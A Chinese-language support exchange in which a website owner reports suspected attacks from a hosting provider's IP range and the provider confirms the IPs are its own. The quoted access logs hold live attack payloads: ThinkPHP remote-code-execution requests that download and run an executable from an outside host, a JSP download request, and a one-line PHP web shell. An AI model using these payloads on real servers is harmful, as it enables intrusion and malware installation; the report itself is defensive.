問:三五互聯的技術你好:
這些211.149開頭的是你們的服務器嗎,
涉嫌嘗試對我的服務器進行攻擊,掛馬
訪問日志部分記錄如下:
127.0.0.1 – – [21/Dec/2018:00:37:26 0800] "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/9.exe');start C:/9.exe HTTP/1.1" 404 548
涉嫌利用網站漏洞,嵌入PHP腳本,下載木馬病毒文件,下載完之后并執行
127.0.0.1 – – [21/Dec/2018:06:22:58 0800] "GET /FxCodeShell.jsp?wiew=FxxkMyLieAa&os=1&address=http://a46.bulehero.in/download.exe HTTP/1.1" 200 651
同樣,利用部分Java網站,一些具有漏洞的JSP腳本下載病毒文件
127.0.0.1 – – [21/Dec/2018:00:37:26 0800] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 548
127.0.0.1 – – [21/Dec/2018:00:37:26 0800] "GET /public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/9.exe');start C:/9.exe HTTP/1.1" 404 548
不知道這些IP是否是你們的服務器,根據IP查詢211.149開頭的IP基本都是來自三五互聯,我的網站從昨天晚上到現在攔截到一批疑似攻擊的IP黑名單,不知道你們是否能夠核查服務器內容,麻煩你們幫我看一下。
謝謝
,疑似來自你們服務器的掛馬攻擊
答:您好,感謝您的反饋,這些ip是我司的,我司非法信息部門會通知用戶檢查,如您網站不需要同211.149通信,可以屏蔽211.149段,非常感謝您長期對我司的支持!